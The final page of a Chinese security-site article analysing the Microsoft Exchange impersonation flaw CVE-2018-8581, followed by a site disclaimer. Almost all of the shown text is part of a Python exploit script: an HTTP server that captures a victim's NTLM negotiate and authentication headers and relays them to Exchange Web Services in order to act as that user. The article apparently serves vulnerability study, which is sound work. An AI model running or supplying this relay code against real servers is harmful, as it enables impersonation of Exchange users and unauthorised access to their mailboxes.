欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Microsoft Exchange任意用户伪造漏洞分析(CVE-2018-8581)

来源:本站整理 作者:佚名 时间:2018-12-25 TAG: 我要投稿
                            if print_debug_info:
                                   print "\n[DEBUG]: NTLM NEGOTIATE string:"
                                   print ntlm_negotiate
                            #Sending EWS request with NTLM NEGOTIATE  and getting NTLM CHALLENGE
                            ntlm_challenge = get_ntlm_challenge(ntlm_negotiate)
                            self.send_response(401)
                            self.send_header('WWW-Authenticate:',ntlm_challenge)
                            self.end_headers()
                     else:
                            self.send_response(401)
                            self.end_headers()
                            ntlm_auth = authHeader
                            if print_debug_info:
                                   print "\n[DEBUG]: NTLM Auth string:"
                                   print ntlm_auth
                            #Sending EWS requets with NTLM AUTH
                            use_ntlm_auth(ntlm_auth)
                            #Let's stop this script
                            step=3
              return
 
try:
       #Create a web server and define the handler to manage the
       #incoming request
       server = HTTPServer(('', HTTPPORT), postHandler)
       print 'Started httpserver on port ' , HTTPPORT
     
       while not(step==3):
              server.handle_request()
 
except KeyboardInterrupt:
       print '^C received, shutting down the web server'
       server.socket.close()
 

上一页  [1] [2] [3] [4] [5] [6] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载